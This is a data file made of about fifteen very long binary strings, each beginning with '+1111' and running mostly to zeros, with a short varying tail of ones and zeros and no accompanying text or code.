+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000001000110100111011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001000110101010111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 